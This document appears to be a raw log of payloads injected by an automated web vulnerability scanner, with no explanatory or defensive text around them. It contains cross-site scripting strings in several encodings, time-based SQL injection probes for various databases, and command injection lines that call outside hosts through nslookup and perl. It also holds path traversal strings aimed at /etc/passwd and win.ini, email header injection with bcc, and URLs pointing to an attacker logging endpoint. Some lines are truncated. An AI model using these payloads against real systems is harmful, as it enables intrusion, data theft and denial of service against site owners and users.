http://attacker-9013/log.php?
}body{acu:Expre/**/SSion(h81k(9124))}
\u003CScRiPt\h81k(9116)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%68%38%31%6B%289417%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9395/log.php?
}body{acu:Expre/**/SSion(9vRs(9466))}
\u003CScRiPt\9vRs(9492)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%39%76%52%73%289431%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9552/log.php?
}body{acu:Expre/**/SSion(Q4Sm(9090))}
\u003CScRiPt\Q4Sm(9331)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%51%34%53%6D%289058%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9895/log.php?
}body{acu:Expre/**/SSion(QWNd(9648))}
http://attacker-9035/log.php?
\u003CScRiPt\QWNd(9383)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%51%57%4E%64%289317%29%3C%2F%73%43%72%69%70%54%3E
}body{acu:Expre/**/SSion(76jj(9074))}
\u003CScRiPt\76jj(9507)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%37%36%6A%6A%289222%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
DStc6lSk')) OR 907=(SELECT 907 FROM PG_SLEEP(15))--
73SNcMrK') OR 504=(SELECT 504 FROM PG_SLEEP(15))--
23M6xz6S' OR 648=(SELECT 648 FROM PG_SLEEP(15))--
-1)) OR 600=(SELECT 600 FROM PG_SLEEP(15))--
-5) OR 92=(SELECT 92 FROM PG_SLEEP(15))--
-5 OR 230=(SELECT 230 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+667-667-1=0+0+0+1
-1 OR 2+667-667-1=0+0+0+1
'+'A'.concat(70-3).concat(22*4).concat(102).concat(85).concat(101).concat(65)+(require'socket'
So...
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
"+"A".concat(70-3).concat(22*4).concat(97).concat(68).concat(114).concat(67)+(require"socket"
Soc...
http://bxss.me/t/fit.txt?.jpg
HttP://bxss.me/t/xss.html?%00
1some_inexistent_file_with_long_name
`(nslookup hitrworeltvcu5735c.bxss.me||perl -e "gethostbyname('hitrworeltvcu5735c.bxss.me')")`
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
|(nslookup hitclsiltbfrybfc00.bxss.me||perl -e "gethostbyname('hitclsiltbfrybfc00.bxss.me')")
".gethostbyname(lc("hitdd"."rpvfebuyc4685.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(70)...
&(nslookup hithkstkjgexz8cb7e.bxss.me||perl -e "gethostbyname('hithkstkjgexz8cb7e.bxss.me')")&'\"...
$(nslookup hityaggjbcshw4a153.bxss.me||perl -e "gethostbyname('hityaggjbcshw4a153.bxss.me')")
'.gethostbyname(lc('hitwy'.'mvbystfl2bc2c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(72)....
(nslookup hitfsaltaxllv943f2.bxss.me||perl -e "gethostbyname('hitfsaltaxllv943f2.bxss.me')")
|echo ifwfsm$()\ rbtrgx\nz^xyu||a #' |echo ifwfsm$()\ rbtrgx\nz^xyu||a #|" |echo ifwfsm$()\ rbtrg...
ctime
sleep
p0
(I30
tp1
Rp2
.
&echo nyhnei$()\ ildlqc\nz^xyu||a #' &echo nyhnei$()\ ildlqc\nz^xyu||a #|" &echo nyhnei$()\ ildlq...
echo tgvjto$()\ ausvwn\nz^xyu||a #' &echo tgvjto$()\ ausvwn\nz^xyu||a #|" &echo tgvjto$()\ ausvwn...
"+response.write(9099078*9200907)+"
'+response.write(9099078*9200907)+'
../../../../../../../../../../../../../../windows/win.ini
response.write(9099078*9200907)
../../../../../../../../../../../../../../etc/passwd
to@example.com>
bcc:074625.19373-148267.19373.33994.19130.2@bxss.me
bcc:074625.19373-148266.19373.33994.19130.2@bxss.me